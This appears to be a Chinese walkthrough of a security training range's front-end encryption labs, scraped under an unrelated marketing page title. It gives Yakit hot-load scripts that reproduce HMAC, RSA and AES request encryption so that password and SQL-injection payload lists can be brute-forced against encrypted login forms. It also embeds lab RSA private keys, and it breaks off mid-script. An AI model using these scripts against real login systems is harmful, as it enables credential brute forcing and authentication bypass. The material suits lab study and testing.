当前位置：首页 > news >正文

京东b2c网站是怎么营销线上商城推广软文

news 2025/7/20 13:22:08

京东b2c网站是怎么营销,线上商城推广软文,wordpress网站标题,网站类型有哪些高级前端加解密与验签实战一、前端验证签名（验签）表单：HMAC-SHA256 使用hmac-sha256的十六进制key值可以加密与页面加密后的值相同热加载： encryptData func(p) { //sha256key值key codec.DecodeHex("313233343132333…

高级前端加解密与验签实战

一、前端验证签名（验签）表单：HMAC-SHA256

在这里插入图片描述

使用hmac-sha256的十六进制key值可以加密

在这里插入图片描述

与页面加密后的值相同

在这里插入图片描述

热加载：

encryptData = func(p) {
//sha256key值key = codec.DecodeHex("31323334313233343132333431323334")~
//账号密码username = ["admin"]password = x"{{x(pass_top25)}}"
//定义列表变量resullistresultlist = []
//for循环嵌套username、password排列组合for uname in username {for passwd in password {
//定义message：为加密前的参数格式message = f`username=${uname}&password=${passwd}`
//结果=十六进制编码（ase256编码）=sign结果值result = codec.EncodeToHex(codec.HmacSha256(key, message))
//m为整个请求体m = {"signature" : result,"key" : "31323334313233343132333431323334" ,"username" : uname,"password" : passwd}i = json.dumps(m)resultlist.Append(i)}}return(resultlist)}

在这里插入图片描述

二、[前端验证签名（验签）表单：先 HMAC-SHA256 再 RSA

在这里插入图片描述

首先对需要加密的内容sha256加密后根据给出的publickey加密在转为十六进制即可获取sign

在这里插入图片描述

替换可绕过签名

在这里插入图片描述

热加载：（注：publickey每次启动时会更改）

encryptData = func(p) {
//sha256key值key = codec.DecodeHex("31323334313233343132333431323334")~
//账号密码username = ["admin"]password = x"{{x(pass_top25)}}"pubulickey = `-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAngHo3NyLc95Rmo5uzCih
mJwHciTdsSr/NNm3e9GqFmNMajqq8iDYLzPuqcG1Tzr1gA0D0xkXPGetzzqMOkPZ
mvO/l+JwuAMiP3kO9CUaOCBOM6CARC0Iaa59Nz/kX/qXd3VoPHVOyqDr3U0oTKVU
o6GVJUpNB14v5QD/IXRZFQHiHaH/SfjJsK+j9VtZQaPGl2ircKbNFC8I3OTA1rK3
DsnTfsBp7I5LERV/8J7L24xOnnNX1a5FuxK5VN4zb5VMduytULIYrc2XxE93WMCN
/cVQc8vpO8UkxCqL25eV2ZYV47obv/YF/2dg/pVnLZfvqTpkX3m98J7Wsnv+mTpt
NwIDAQAB
-----END PUBLIC KEY-----`
//定义列表变量resullistresultlist = []
//for循环嵌套username、password排列组合for uname in username {for passwd in password {
//定义message：为加密前的参数格式message = f`username=${uname}&password=${passwd}`
//结果=十六进制编码（rsa(hex(ase256编码))）=sign结果值result = codec.EncodeToHex(codec.RSAEncryptWithPKCS1v15(pubulickey, codec.EncodeToHex(codec.HmacSha256(key, message)))~)
//m为整个请求体m = {"signature" : result,"key" : "31323334313233343132333431323334" ,"username" : uname,"password" : passwd}i = json.dumps(m) resultlist.Append(i)}}return(resultlist)}

第二种：

encryptData = func() {key = "1234123412341234"dump(key)publicKey = `-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzEHpYzW8tXIHUNwTnZXj
8Vz9MBX1/Jb6TdRw6v2FPkJ3UlobiHgzUn/LMcC8L9wKMFQvA3h88ij3GNgH4iED
1iJzHhhc0FCG9HGQK4JgDwPzrwW7JCoL7OyjJ6EBVND4ETMXBnm2s0DJnt4zrMGN
ZSyNoEtfJaNHOm0ZZFTgi1ON/bdfVIOhVgZFbDZWJUVyPbStGaoT5gIj8HgC866d
I997i82jzk3Urou1a11jHvUB4ZL5mwrdawPsC7eok9h6M4iRFLYPmmay1NYCdr5G
GC1x6idk73/vXx7f9Y6+gQVhsKmOCQOQeE4kGhzs+3m000yOiMUb520T1HYER6SD
PwIDAQAB
-----END PUBLIC KEY-----`data = "username=admin&password=123456"signature = codec.EncodeToHex(codec.RSAEncryptWithPKCS1v15(publicKey, str(codec.HmacSha256(key, data)))~)body = f`{"signature": "${signature}","key": "31323334313233343132333431323334","username": "admin","password":"123456"}`dump(body)return body
}beforeRequest = func(rsq) {body = encryptData()return poc.ReplaceBody(rsq, body /*type: []byte*/, false /*type: bool*/)
}

三、CryptoJS.AES(CBC) 前端加密登陆表单

解密：base64 --> aes-cbc

加密：aes-cbc --> base64

在这里插入图片描述

加密后与表单加密data相同

在这里插入图片描述

解密：

在这里插入图片描述

热加载爆破

在这里插入图片描述

热加载：

encryptData = func(p) {//aes-cbc，密钥和偏移量key = codec.DecodeHex("31323334313233343132333431323334")~iv = codec.DecodeHex("e90599cc4a0915b0250ed11f70ca4c58")~//账号、密码username = ["admin"]password = x"{{x(pass_top25)}}"//定义列表遍历resultlist[]resultlist = []//for循环嵌套，排列组合生成账号密码for uname in username {for passwd in password {//定义message内容为被加密参数以及参数值message = {"username":uname,"password":passwd}//对message转为json格式i = json.dumps(message)//对i进行cbc加密，默认 PKCS7Padding填充，后base64加密result = codec.EncodeBase64(codec.AESCBCEncryptWithPKCS7Padding(key, i, iv)~)resultlist.Append(result)}}return resultlist
}

四、CryptoJS.AES(ECB) 前端加密登陆表单

无需偏移量只需密钥即可加解密

解密：base64 --> aes-ecb

加密：aes-ecb --> base64

在这里插入图片描述

解密：

在这里插入图片描述

加密：与表单data加密内容相同

在这里插入图片描述

热加载爆破

在这里插入图片描述

热加载：

encryptData = func(p) {//aes-ecb 只需密钥不需要偏移量key = codec.DecodeHex("31323334313233343132333431323334")~//账号、密码username = ["admin"]password = x"{{x(pass_top25)}}"//定义列表resultlist，使其组合生成的json格式字符串存入resultlistresultlist = []//for循环嵌套，排列组合生成账号密码for uname in username {for passwd in password {//定义message，格式为加密内容格式message = {"username":uname,"password":passwd}//dump为json格式传入ii= json.dumps(message)//ecb后base64result = codec.EncodeBase64(codec.AESECBEncryptWithPKCS7Padding(key, i,nil)~)resultlist.Append(result)}}return resultlist
}

五、CryptoJS.AES(ECB) 被前端加密的 SQL 注入

与上述四题同理，只不过加入了sql注入

在这里插入图片描述

相同加解密手法即可

在这里插入图片描述

如果需要请求包解密的话需要beforeRequest可查看最后一题

在这里插入图片描述

热加载爆破：

在这里插入图片描述

热加载：

encryptData = func(p) {//aes-cbc-sql注入key = codec.DecodeHex("31323334313233343132333431323334")~//账号、密码username = x"{{x(xpath-injection)}}"password = x"{{x(pass_top25)}}"//定义resultlist列表，将for嵌套循环的json格式输入进列表中resultlist = []//for循环嵌套，排列组合生成账号密码for uname in username {for passwd in password {//定义message来设定加密内容格式message = {"username":uname,"password":passwd}//dump为json格式i = json.dumps(message)//将message加密ebcresult = codec.EncodeBase64(codec.AESECBEncrypt(key, i, nil)~)resultlist.Append(result)}}return resultlist
}

六、CryptoJS.AES(ECB) 被前端加密的 SQL 注入(Bypass认证)

在这里插入图片描述

和第五关相似可直接用第五关热加载万能密码绕过

在这里插入图片描述

七、AES-ECB 加密表单（附密码）

在这里插入图片描述

解密：base64 --> aes-ecb

在这里插入图片描述

加密：aes-ecb --> base64

在这里插入图片描述

替换data解密成功

在这里插入图片描述

热加载爆破

在这里插入图片描述

热加载：

encryptData = func(p) {//aes-ecb 无需偏移量key = codec.DecodeHex("31323334313233343132333431323334")~//账号、密码、年龄username = ["admin"]password = x"{{x(pass_top25)}}"age = 123//定义resultlist列表，将转化的json格式字符串输入resultlist = []//for循环嵌套排列组合for uname in username {for passwd in password {//定义message 为固定加密内容message = {"username":uname,"password":passwd,"age":age}//将message循环后的字符串dump成json格式i = json.dumps(message)//加密result = codec.EncodeBase64(codec.AESECBEncrypt(key, i, nil)~)resultlist.Append(result)}}return resultlist
}

八、RSA：加密表单，附密钥

在这里插入图片描述

提供了publickey和privatekey

也可base64解出公私钥

在这里插入图片描述

解密：base64 --> RSA-OAEP sha-256

在这里插入图片描述

加密：

在这里插入图片描述

替换后前端解密成功

在这里插入图片描述

热加载爆破：

在这里插入图片描述

热加载：

encryptData = func(p) {//前端RSA-OAEP无需填充publickey = `-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA8tV/wzS3Lu27BeeDL6ih
m1NHqiMiO7XtHA81iaYw4LAx/GcuTtCoEkTm816K6aKxCCqMnr3Ge3tPWiKnidfI
10pZyA0f48oi/AtmTp5IC5xKi/kY79YUTwzphe36jWQ6DnIOr60XCyj2Ln6Pt8UE
PJG5mYnxnY4Mh5hK+mSysod13BbtRHslpeIZ0VrN8uE7qy68DnWvAYzJfaCjOlIz
BLMULq+8RXHsVqS1M6IarKx++hcPlZHjh6NADR+XUByOhpWdwQhmLeOxJxUuXtXB
OHiBUaGfdsYSHRSRJs91roLtw0cp4CdjT+6mMlWjVNyPlfyJigOaq5Ui6BfOjKg9
hwIDAQAB
-----END PUBLIC KEY-----`//账号、密码、年龄username = ["admin"]password = x"{{x(pass_top25)}}"age = "123"//定义列表变量resullistresultlist = []//for循环嵌套username、password排列组合for uname in username {for passwd in password {//定义message：为加密前的参数格式message = {"username":uname,"password":passwd,"age":age}//dump为json格式传入ii = json.dumps(message)//结果=base64（rsa加密）=sign结果值reslut = codec.EncodeBase64(codec.RSAEncryptWithOAEP(publickey, i)~)resultlist.Append(reslut)}}return resultlist
}

九、RSA：加密表单服务器传输密钥

在这里插入图片描述

访问密钥链接

在这里插入图片描述

第八题热加载爆破，解密与第八题相同

在这里插入图片描述

十、RSA：加密表单服务器传输密钥+响应加密

在这里插入图片描述

相同获取密钥方式

在这里插入图片描述

解密与上题相同

在这里插入图片描述

解密响应包

在这里插入图片描述

热加载与上述RSA相同

encryptData = func(p) {//前端RSA-OAEP无需填充publickey = `-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA0taak0t06jYBxOlICEsG
39Ey37KXbHVBuo0D+KN4iQcTow0BSGgIacNviJzwf8cSKJA/6O1jM4IeRkbDZ2BP
C8/8uIB0C9HdivdQmNpBMEluTnyvrjHmO40J/FkZ2MSYNzSKuZd81+CxkCftuKEn
LOI5zzqxEk2grACKH06lPs9GuMeGvznn8nzIyqy7xWlJdKXOXRUTwLnjNag5KTCD
6N5gcET1MPCGW71sEQ0HUvePfyZ4AN4Vq7DZRtQ7LGMPHJ/kB1z0qxrYfikwXCFd
sCcnckcFCC/2+DaL4MklpJSlb5b59aC4WGmS+V/qUOf8YzK6zRDtdfe4Cu2vWwui
kwIDAQAB
-----END PUBLIC KEY-----`//账号、密码、年龄username = ["admin"]password = x"{{x(pass_top25)}}"age = "123"//定义列表变量resullistresultlist = []//for循环嵌套username、password排列组合for uname in username {for passwd in password {//定义message：为加密前的参数格式message = {"username":uname,"password":passwd,"age":age}//dump为json格式传入ii = json.dumps(message)//结果=base64（rsa加密）=sign结果值reslut = codec.EncodeBase64(codec.RSAEncryptWithOAEP(publickey, i)~)resultlist.Append(reslut)}}return resultlist
}

在这里插入图片描述

解密响应包：

序列使用：

在这里插入图片描述

设置后提取响应包内公钥，同理获取私钥

在这里插入图片描述

两种热加载方式：

序列

在这里插入图片描述

var PRIVATE_KEY = `-----BEGIN RSA PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDkbHvHkoa146Np
/8e6Qs10mriMNGZuu7vHLWt76sV9p4ZAyb4dcv6xjdZMD4fwJJe9ONazy0U///wM
ROvVe/YaeDejAk1CPmm2p3jnPcC7g7AbwSbODQuVVx0OdFu1fM0fN4C/gu3pdC/S
LP1gYbNnzCRvjEpGwHPumrWGJdt0YrzfG24mdmK8ODT7k/t2dkts6HxcT8BLBOAj
opcKSVSlnE4sbmSkcWvn1FV4hDcNBVFjyNyjrwDh4Cl4s7gzEwDl9N7+HRU6qYtM
aJ6ZNCrxk9nbURTrigS0s5Z51lMAf2IVjVtkNC2r/UxTSKU/i8BA0xDaB0FkW3Os
btVojOi3AgMBAAECggEAIIozt+JvvkmHZfpCAY6ypgHEeHSegvfLcDxQK37uU1Ai
F+ilZJyVG8YQ2RT9UIBl/VazfzldzBgzV6wZzHe0P2EQy+/wAZfSh2qkFoz9f7jq
xYlmdcP1+nhGc2CwD9KPhfrqJF4Kdk9O4Kn4Dlrcq9Sw/BMIIbwYx8zSPyH1eUay
p2vv5KpYcdlKO+6dobuqIgL6c2qkQN5pJ9iO7xKIdD1nX0lUXRs/Sokttq03JwX6
uX3VUrf6pUl6mvTKF6AC2q793UyqBNbaLSiU03VaV+6tjV7ko+i4cNLhqMmfnNdO
QoMGdPSwzKLxQPCdfYjnMtzIl/gmnqoi9wHzYXUoAQKBgQD3GBwJQdnvdiSiGq9e
fQoZ9Y51XrCmUSwwKROayaLTaSO6CjSs40DQh4uV+eHOp+Ire4yg03euYfigvwPC
k5epG4dNG5pMi8vLLFLxaZshHjJ1Ul4IlBdLig5Kp10HieVom3NxSJCw+R61xlfw
95bdWoBJKWQ+UO6HurKLWjy4gQKBgQDsqBsNkaEi3u1KyIUlaQtYy+MCNWuPPY60
ohtpuetmEYi2cg4u6ciBxWYi3xM4rSr/UDMNgxLCq6odVXQnTEjSH33JtJgUwwYk
C9PP9E8sHwieVidr6IV4MSK0lBV46gSAVk8xnyv+huTJxpUNZPT51HIN+eJyi9Ys
L+aPuIbFNwKBgCmC0WL0vyotjOX22bNkCkhmKnKpX7/xLx1AKVz9tu8RYMEmaccJ
vp/JxbeCbV8McUCg1vVF0XtoVh6bOIR9yyLLzyUzF+74JVqSrbSE61za99sh5U5H
oso7/T6pc0WK8xFp3DER4cz5bSFYmvmOfrfdNmQUIhUd/5Sp1sj2dfEBAoGBANCq
4T+zmrseiWiZKh10Y9bl38IAzFg+1Oec0EMG9fLHnx4Pr0XaSTtzjL1OqKoetnzs
gDd3zUDtEFBRGtvTvZnYvpbtr/MOiwmZjCgeqPikXHsQSC4zlgwGdy12LQCyh0mJ
0MZWLPp+gpkPijmHPSJUGkUMgoixmCTaD5fGAr89AoGBALbWdQz8xDBDTFjO4Bz4
dy6XL1Fsxl3kc9WHlvRJEzjiZjS99GmzFaUK88PiONx1t3DtaqWhujin3TXf3D9N
JUcZUWwmhYdgmoiAz/ryro9qJO/gCzUuBT0HOzq5l9Wh4msRs3j1ow4MvsEjCr1x
WGtpNwl1sPaB+VuwVXX5hUnK
-----END RSA PRIVATE KEY-----
`
decryptData = func(packet){body = poc.GetHTTPPacketBody(packet)jsonbody = json.loads(body)data = codec.DecodeBase64(json.loads(body).data)~data = codec.RSADecryptWithOAEP(PRIVATE_KEY, data)~data = string(data)body = json.ReplaceAll(jsonbody, "$..data", data)body = json.dumps(body)return poc.ReplaceBody(packet, body, false)
}encryptData = func(p) {//前端RSA-OAEP无需填充publickey = `-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5Gx7x5KGteOjaf/HukLN
dJq4jDRmbru7xy1re+rFfaeGQMm+HXL+sY3WTA+H8CSXvTjWs8tFP//8DETr1Xv2
Gng3owJNQj5ptqd45z3Au4OwG8Emzg0LlVcdDnRbtXzNHzeAv4Lt6XQv0iz9YGGz
Z8wkb4xKRsBz7pq1hiXbdGK83xtuJnZivDg0+5P7dnZLbOh8XE/ASwTgI6KXCklU
pZxOLG5kpHFr59RVeIQ3DQVRY8jco68A4eApeLO4MxMA5fTe/h0VOqmLTGiemTQq
8ZPZ21EU64oEtLOWedZTAH9iFY1bZDQtq/1MU0ilP4vAQNMQ2gdBZFtzrG7VaIzo
twIDAQAB
-----END PUBLIC KEY-----`//账号、密码、年龄username = ["admin"]password = x"{{x(pass_top25)}}"age = "123"//定义列表变量resullistresultlist = []//for循环嵌套username、password排列组合for uname in username {for passwd in password {//定义message：为加密前的参数格式message = {"username":uname,"password":passwd,"age":age}//dump为json格式传入ii = json.dumps(message)//结果=base64（rsa加密）=sign结果值reslut = codec.EncodeBase64(codec.RSAEncryptWithOAEP(publickey, i)~)resultlist.Append(reslut)}}return resultlist
}// 修改响应包
afterRequest = func(rsp){return decryptData(rsp)
}

mirroHTTPFlow

在这里插入图片描述

//加密
encryptData = func(p) {//前端RSA-OAEP无需填充publickey = `-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAoEpQP1HQ2CDllubw30U2
6UBmhyjE3QHxkvD3kpIOzVFnKG3xY6rDNOfi4x9mzREcrSO8P0myuRaIjNrVo3wx
sAVe0meVPgVG1g1D2bQawNAeLVhJLjQBgPGSYGyh/olJBvQAVGITIxi5U81Lr2Rv
I8rBG0jDmH1tA4gE9CNTX780eUzOL6OTs7gC4vTeAGtHqeGmRnF8zghI6tDOYT4F
CRwyRvEx4aOJx5kJaaxfmXmG4bF5T6/OTJSlAPm/Xr+tWZJ2+/BPGpw4BEWx+bfy
P5cq5OpVJqIJhkbU3hsgK2m9A/yQcNcVhAzAu0gOep33/W7x9282fdxQ1tktIh4q
bQIDAQAB
-----END PUBLIC KEY-----`//账号、密码、年龄username = ["admin"]password = ["admin"]age = "123"//定义列表变量resullistresultlist = []//for循环嵌套username、password排列组合for uname in username {for passwd in password {//定义message：为加密前的参数格式message = {"username":uname,"password":passwd,"age":age}//dump为json格式传入ii = json.dumps(message)//结果=base64（rsa加密）=sign结果值reslut = codec.EncodeBase64(codec.RSAEncryptWithOAEP(publickey, i)~)resultlist.Append(reslut)}}return resultlist}
mirrorHTTPFlow = func(req,rsp, packet) {// 获取私钥以解密响应数据pem = packet.privatekey// 切割响应中的数据，作为 JSON 加载_, body = poc.Split(rsp)body = json.loads(body)// 获取响应中加密的部分data，切割后的响应数据作为body，获取其中data参数，后通过base64(rsa)解密得到明文data返回值data = codec.RSADecryptWithOAEP(pem, codec.DecodeBase64(body.data)~)~return string(data)
}

十一、前端RSA加密AES密钥，服务器传输

解密：rsa解密aes的key，iv，后aes解密

aes(key,iv)=rsa(base64)

result=base64(aes-gcm)

在这里插入图片描述

其中存在RSA加密的AES的key和iv

在这里插入图片描述

解密：key

在这里插入图片描述

解密：iv

在这里插入图片描述

响应包key:

在这里插入图片描述

响应包iv:

在这里插入图片描述

为AES-GCM加密

在这里插入图片描述

热加载：

encryptData = func(p) {//RSA加密AES密钥和偏移量//公私密钥publickey = `-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAngHo3NyLc95Rmo5uzCih
mJwHciTdsSr/NNm3e9GqFmNMajqq8iDYLzPuqcG1Tzr1gA0D0xkXPGetzzqMOkPZ
mvO/l+JwuAMiP3kO9CUaOCBOM6CARC0Iaa59Nz/kX/qXd3VoPHVOyqDr3U0oTKVU
o6GVJUpNB14v5QD/IXRZFQHiHaH/SfjJsK+j9VtZQaPGl2ircKbNFC8I3OTA1rK3
DsnTfsBp7I5LERV/8J7L24xOnnNX1a5FuxK5VN4zb5VMduytULIYrc2XxE93WMCN
/cVQc8vpO8UkxCqL25eV2ZYV47obv/YF/2dg/pVnLZfvqTpkX3m98J7Wsnv+mTpt
NwIDAQAB
-----END PUBLIC KEY-----`privatekey = `-----BEGIN RSA PRIVATE KEY-----
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQCeAejc3Itz3lGa
jm7MKKGYnAdyJN2xKv802bd70aoWY0xqOqryINgvM+6pwbVPOvWADQPTGRc8Z63P
Oow6Q9ma87+X4nC4AyI/eQ70JRo4IE4zoIBELQhprn03P+Rf+pd3dWg8dU7KoOvd
TShMpVSjoZUlSk0HXi/lAP8hdFkVAeIdof9J+Mmwr6P1W1lBo8aXaKtwps0ULwjc
5MDWsrcOydN+wGnsjksRFX/wnsvbjE6ec1fVrkW7ErlU3jNvlUx27K1QshitzZfE
T3dYwI39xVBzy+k7xSTEKovbl5XZlhXjuhu/9gX/Z2D+lWctl++pOmRfeb3wntay
e/6ZOm03AgMBAAECggEAKvzOA7ik4AMuJGR31GeBf2mDxRQulFLkV9abyr4CDlE5
qvUHKRSyfDUey2R+FW4u+IWR8s6yuaZjbSu6lud6vmNuTr42eHmxyZ7/6IBnn7l6
TSVvgBzYWxgzzOI/GbWtm7x/fWNU6l/Zi73AJwob+uCtGRYb2tNPKHia8Nkcm1AY
atJ3mrgb9fx6CeSW4y6VU1Gq7iSIn7NFMaRnS6v+cvV3ILCFJ3uNq+8/APe9AGCD
imiGDNOlDw76QkmabD4m9rS+BzGOMYXFGEW55e99oKk+fKqSIV+GDvqTRoBUQcnd
4soEiVXcGQ66t0nV6ilJ8d/xh3B9HGX3BHk4FJWM4QKBgQDIppSwV/ojz7rvtJSn
k79cKxMD04kSQkjHh/VKcT4GE6h45l+6zcR7KBqyQKNeIcMwSwMm1vMaBBOKYVz2
K4UW7PrtiIvrBvpqeglVKLghWladared7yDvKEHFGik1QXWBHN+GvhntvHRJeCPI
qVKBynbhp1UOK6TlC4NF/gar2QKBgQDJl/nj9mRvZ14XFkSZ2TtUqHrHzoPGMB3z
YmioY6DTVwWG9WviqjFQw7jqkoJdJ7dQ4YW4turtMNY3Sg5HxyuzjztzoPyqD6M2
gdsM6ghuPoq1l6p+h2YMVmEtbWLZ+T3njfgylE3JxLuAbFVYggr2bNJWIf0qfMUO
4OM73kmHjwKBgQCGvV4xwRJng/JrT19X3N5u3ToKor10NnC7FLCCSeM1n3PNpB36
yny7myW6N6+84X06a9T0+vkKqlwY2+LaKEVaLM8gPUaAEBKO995Wgl6LfyeU0/nz
o4YBM45e9n9flNJ8XlA4ImY1AA0y3Otir1mJcNU+GOkD+AjmCkIf+UKvmQKBgEOE
0T9WwODHIC5fWO6mYUbDfwv40Q3KA94GccMkSzM9jC5deJrcIdRJGWAHXf5RVQaT
4jOxoBF9L+IovYuw26QyLtlVbAqRXjrdVz6GC/jQnaigeYwTUUyEidurLVaQMfmi
BST7ouoXKC2lGxifxYgvfms2yxI149JN5A2jL8FlAoGARsUjJP/DvdDGEVlsNbDB
UnUKxT8aWtxtPLKQfTUla/T7AEtwysUO3bog27aXptWIzx5lNQs+w9Gum2QfiuEx
naUe50VJfQODPYOWMAfPRfXycMcImSlNq/RpP3b73ABKak3GAoGrDPbCZKZ/PfhL
TRNkegCNcIzDs03dmw+xUVE=
-----END RSA PRIVATE KEY-----`//账号、密码、年龄username = ["admin"]password = x"{{x(pass_top25)}}"age = "123"//AES密钥和偏移量解密，RSA(publickey,base64)key = codec.RSADecryptWithOAEP(privatekey, codec.DecodeBase64("H5N2T9QqHedusVO1wa+8DOOcAUN+T0A1cIEhyi93bkKVbEvfFsoFx67ZOTYVyRiSUDEfnC91QgJJnX6Cu2KhkgnwzJXaqDhXuUKvyRvcackSCvBCKbkuqQhguNEITQh0Qw6TqkKpC5x74JNEb5MKZ9/LqqtcA0clVteqS3m9KYx/+93rfQ7yqlPPh87dtSSCmYHw32uKe1u+/eRDofp8Oe/XJlyUa6AIAJ21jo2vt2L2NHoqItnG82xmLrweSoe1U9HBYKDOY1JrO1D/n8GLB9uZPcyBgGm/fSCM02JaMrTuSJdyEQlVuya0rTafVtEbQVtEt0uHbycV1c+7ou96EA==")~)~iv = codec.RSADecryptWithOAEP(privatekey, codec.DecodeBase64("XOAFlHCWYhVbNO8ffnUS2CM400QCwoucjLOLiqhVDALw5DqpKeQpFfkt44h8alHX1Gx/JMxYNWVGOcA26leSclkah3NS1FC9CxLOWhUjhnHXwpS11iSIksoozEVqKOz4cOFDU/ysK59TYXZ7D3ymtUnRd1Op2C1j8ghDpS8+RoaXazfKahBFY7msfGPA3mNxdezcmuhKdVKdQa/BIYRdq/C3jY2SmbHByVgAYC4audPzM11z1SrLF4QVYnhc50rEVnjI1yo3E+49GJ8/0dpBIwQByrc5vwzzq8lu/uStBZ7XZJ0yk+K9gxp6SgKLPzp/8qksZZeY4czLzUYxadX4eQ==")~)~//定义列表变量resullistresultlist = []//for循环嵌套username、password排列组合for uname in username {for passwd in password {//定义message：为加密前的参数格式message = {"username":uname,"password":passwd,"age":age}//dump为json格式传入ii = json.dumps(message)//结果=base64（AES-CGM-size12加密）=sign结果值reslut = codec.EncodeBase64(codec.AESGCMEncryptWithNonceSize12(key,i,iv)~)resultlist.Append(reslut)}}return resultlist
}

热加载爆破：

在这里插入图片描述

解决http响应加密问题：

序列+mirro方式：

（可固定key+iv或是拟定或随机key和iv对encryptedIV、encryptedKey、data进行加密来达到效果）

获取公钥加密，获取私钥解密

在这里插入图片描述

同理提取响应包内容

在这里插入图片描述

热加载：

encryptData = func(p) {//RSA加密AES密钥和偏移量//公私密钥publickey = `-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAoEpQP1HQ2CDllubw30U2
6UBmhyjE3QHxkvD3kpIOzVFnKG3xY6rDNOfi4x9mzREcrSO8P0myuRaIjNrVo3wx
sAVe0meVPgVG1g1D2bQawNAeLVhJLjQBgPGSYGyh/olJBvQAVGITIxi5U81Lr2Rv
I8rBG0jDmH1tA4gE9CNTX780eUzOL6OTs7gC4vTeAGtHqeGmRnF8zghI6tDOYT4F
CRwyRvEx4aOJx5kJaaxfmXmG4bF5T6/OTJSlAPm/Xr+tWZJ2+/BPGpw4BEWx+bfy
P5cq5OpVJqIJhkbU3hsgK2m9A/yQcNcVhAzAu0gOep33/W7x9282fdxQ1tktIh4q
bQIDAQAB
-----END PUBLIC KEY-----`privatekey = `-----BEGIN RSA PRIVATE KEY-----
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQCgSlA/UdDYIOWW
5vDfRTbpQGaHKMTdAfGS8PeSkg7NUWcobfFjqsM05+LjH2bNERytI7w/SbK5FoiM
2tWjfDGwBV7SZ5U+BUbWDUPZtBrA0B4tWEkuNAGA8ZJgbKH+iUkG9ABUYhMjGLlT
zUuvZG8jysEbSMOYfW0DiAT0I1NfvzR5TM4vo5OzuALi9N4Aa0ep4aZGcXzOCEjq
0M5hPgUJHDJG8THho4nHmQlprF+ZeYbhsXlPr85MlKUA+b9ev61Zknb78E8anDgE
RbH5t/I/lyrk6lUmogmGRtTeGyArab0D/JBw1xWEDMC7SA56nff9bvH3bzZ93FDW
2S0iHiptAgMBAAECggEAXDTjnMkv3mRuLjSDc6yZPeyyDiZBuPEZSnIbuNEUer/N
G9DC/5aH3LNYLVcvB+BEIsVf0PhQO3De9EgehYE4BA3S0i6MB7V5XkEbOu0ERs5x
zZvv3QhFpStSDO3w8j9/JuTOG7yfTZ03XyHF3Atmc6x7EXr2KY5dW56vWtHHcFfg
XMRviQkysLEPtQIIsyq3qU8DZ0TC44IWk903PohyJkbT0JyrxvcS1fl40CTUo+v3
Lr8PLKk3J9A2FXw87gqiSLaOUkDBnG02bhmMlF8HcQLBuxNnY7w9H95uipFl0kEQ
tupf/QOhY4hBS1/Ek+cV0I5TLD0z92bz/YYDgf5HgQKBgQDDShfP9X8NhHBI4iy1
wgZ/Xrxtaeea1MPfDlnv6aF+voVV46iwWJb50+Ydl8UJ+KTIYvirYr67fT3+YoeY
zTMHrRBWZI2wdtTJTRZbqBSYTux9/CQI4zIyIAfQnpmRTm30SyHaP5DInRAcYBsp
t6uNIn2GRkvEVtuw1OSKVwLR2QKBgQDSHtmlV/0PVsZvBb2bWOhVwIVC7EqUwDiH
lxE8UB7JtzPlb79ILA4LQmlnA9DdyQbBTSndrmmeaiNNWo2Da1Xw6p8khjmpHb5X
TofW3NhRcC0rVcRoMQ0FWz+m8MOxxLxQXkaiCuXHN7NallOZeKJw/wpGi1qVPcV4
gtoXgfKstQKBgGbaGvh3v1aLLef01r9TVMC4UFz/re8pp49Oq6djUJ7EEM1PfYSC
4+Dn7QYg7LF3trGjDnyVIQb1yzSzB98+E2Yzi6s0gjsyGpd6dhAH0fD1gDBKH2Be
6AzmObdyEEcrG1XSTB355HMD5XxMUYIDLeLDC4EwfK8HX+Ud+s+xS9bhAoGBAKcQ
uGRqzV7A1A26NsOpsTFdXZeUYMhc/ZVxW9bkrVYdQDoQ27n6rT/ukffCZPOyvpg7
TipgXsICCgebFCGF2lMveVGFF5uLdqfcXM1N0wENfByUmRFuzrePkdCeZjqV/lS4
YNi+aWw4sXY5SEciT6YgYn8sld1LvBLRl65ROC5xAoGBALRSAbI9+Yci4JTidajy
+a6RBbnZxW21tR2xdgyBxlCaNXs3obc9tNL/AjKRSGhmqDfnW0Dk+LiaeJhjLpIX
ModQwzJH5RTa2fY4qYmx4O7vzBopxVMCVtohqn5Mqlp0KL/gQP2G3szgYaB/Z8Zv
ia2VCm3zykblsoSn8gzUo3DA
-----END RSA PRIVATE KEY-----`//账号、密码、年龄username = ["admin"]password = ["admin"]age = "123"//AES密钥和偏移量解密，RSA(publickey,base64)key = codec.RSADecryptWithOAEP(privatekey, codec.DecodeBase64("YrtvJREhDaJjsf3pU5pfMV/u5zt/ZgNiZArRs+upWc4t1PQaAGWvOZm+dJlKh6whRhqRDcFLBvBr8PqiAIDmBqTKBETBjwnObBI2jz/wzULzvEpHkUodR6pQCX5RqRftfTStXoKVe3kfgQKduU5XTtlFXTlQqqQXeuEn0u9Vu/W/mOL0qo5gpSOfjBujxGVbjHCMILUJvX9LnpJhdTBFIyka7R9gJWxJPQm+Bko17Aa2R8a+DXAIpRYx+3LlS5KLodopF7EAJ8ZB+XPrbQGzQnxiJ7ZR2/vWEM0yRcFBZCw68Yi2S/9So9DTooSXrDQp3C8dc/6n3voI6zqB1TzH9w==")~)~iv = codec.RSADecryptWithOAEP(privatekey, 